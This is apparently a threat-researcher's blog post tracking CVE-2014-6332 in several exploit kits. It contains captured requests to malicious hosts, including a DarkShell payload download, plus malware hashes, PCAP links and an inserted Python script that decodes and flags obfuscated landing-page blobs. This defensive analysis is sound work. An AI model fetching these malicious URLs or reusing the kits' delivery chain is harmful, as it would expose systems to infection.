2014-11-21 - Exploit Integration

CVE-2014-6332 (Internet Explorer) and Exploits Kits

For this CVE, refer to :

The first encounter I had with this CVE in an exploit kit was in Sweet Orange, from the actor pushing DarkShell via compromised KR websites. The landing provided by @MalwareSigs on 2014-11-19 already contained CVE-2014-6332.

So this actor :
DarkShell pushed by Da Gong CK VIP (cf. comments) via CVE-2014-0515
that we saw moving to Sweet Orange :

Sweet Orange :

The URL patterns are different, but at a given time the modifications are similar on both...

Da Orangade firing CVE-2014-6332 and DarkShell Call back
GET http://98.126.249 .92:82/index.html
200 OK (text/html)

Sweet Orange Landing
A replace, then a b64decode on the second b64 blob, and we have :

CVE-2014-6332 in Sweet Orange
GET http://v.krtedun .com/sum.exe - DarkShell - fc1a3c9fc7a80e80109f1e2a32e2b057
200 OK (application/octet-stream)

Here is a more "standard" Sweet Orange :

CVE-2014-6332 fired by Sweet Orange - And Betabot call back.
File : You'll find a PCAP illustrating this here :
http://www.threatglass.com/serve_pcap/498fe35b94145153f51c51f66abe42af/20141121
from http://www.threatglass.com/malicious_urls/volumebass-com-2014-11-21 (in this pcap the CVE-2014-6332 is in the first b64 blob)
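The "replace then b64decode" step above, and the note that the CVE-2014-6332 blob sits in the first b64 blob in one capture and the second in another, is the kind of triage an analyst repeats on every new Sweet Orange landing. The script below is an added example (not from the original post, nor from any kit or tool it mentions): it pulls every long base64-looking run out of a landing page, tries a plain decode and then an assumed character-swap decode, and flags decoded content carrying the VBScript `redim Preserve` tokens that characterise the CVE-2014-6332 trigger. The swap table, the marker tokens and the sample landing page are all constructed assumptions; the real replace used by the kit is not given on the page.

```python
import base64
import re

# Assumed obfuscation: the landing swaps three base64 alphabet characters before
# embedding the blob. Constructed for this example; the kit's real mapping is unknown.
SWAP_TABLE = str.maketrans({"!": "+", "-": "/", "_": "="})

# Triage heuristic only: tokens typical of the VBScript trigger for CVE-2014-6332
# (the OleAut32 SafeArrayRedim bug). Chosen by me, not taken from the post.
CVE_2014_6332_MARKERS = ("vbscript", "redim preserve")

# Any run of 40+ chars drawn from the base64 alphabet plus the swapped characters.
B64_BLOB = re.compile(r"[A-Za-z0-9+/!_=-]{40,}")


def extract_blobs(html: str) -> list[str]:
    """Return every long base64-looking run found in the landing page, in order."""
    return B64_BLOB.findall(html)


def decode_blob(blob: str, swapped: bool = False) -> str:
    """Undo the (assumed) character swap if asked, then strict base64-decode.

    validate=True makes a blob that still contains swapped characters fail loudly
    instead of being silently decoded with those characters dropped.
    """
    text = blob.translate(SWAP_TABLE) if swapped else blob
    try:
        return base64.b64decode(text, validate=True).decode("latin-1")
    except (ValueError, UnicodeDecodeError):
        return ""


def triage_landing(html: str) -> list[dict]:
    """Decode each blob (plain first, then swapped) and flag CVE-2014-6332 markers."""
    findings = []
    for idx, blob in enumerate(extract_blobs(html), start=1):
        decoded = decode_blob(blob) or decode_blob(blob, swapped=True)
        lowered = decoded.lower()
        hit = all(marker in lowered for marker in CVE_2014_6332_MARKERS)
        findings.append({"blob": idx, "decoded": decoded, "cve_2014_6332": hit})
    return findings


# Constructed landing fragment (not a real capture): blob 1 is plain base64 of a
# harmless decoy, blob 2 is the swapped encoding of a VBScript fragment with the markers.
_PLAIN = base64.b64encode(b"<script>document.title='landing';</script>" * 2).decode()
_VBS = b"<script language=vbscript>\nredim Preserve a(1)\n' constructed placeholder\n</script>"
_SWAPPED = base64.b64encode(_VBS).decode().translate(str.maketrans({"+": "!", "/": "-", "=": "_"}))
SAMPLE_LANDING = f"<html><body><div>{_PLAIN}</div><div>{_SWAPPED}</div></body></html>"
```

Running `triage_landing(SAMPLE_LANDING)` reports blob 1 as clean and blob 2 as carrying the CVE-2014-6332 markers; on a real landing the ordering tells you which blob to pull into Fiddler, as with the first/second blob remark above.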

Neutrino :

Neutrino firing CVE-2014-6332 embedded in a Flash file

Please refer to this post : Neutrino : The come back !

Archie :

First spotted by Will Metcalf, here is CVE-2014-6332 in Archie

CVE-2014-6332 - 2014-11-24
Decoded b64 here http://pastebin.com/EhpdrZvy
Fiddler here

Flash EK

Flash EK firing CVE-2014-6332 - 2014-12-13
Edit : 2014-12-21 - Kaspersky named what we were calling Andromedins or AndroKins : Chthonic
Sample : 1d9b286ff22a99dd7087f0e48e1deb4f

Fiddler Here

NB : it's in RIG and Angler (2015-01-30 for the latter).
Will update asap.

Read More :

Neutrino : The come back ! - 2014-11-20
IBM X-Force Researcher Finds Significant Vulnerability in Microsoft Windows - 2014-11-11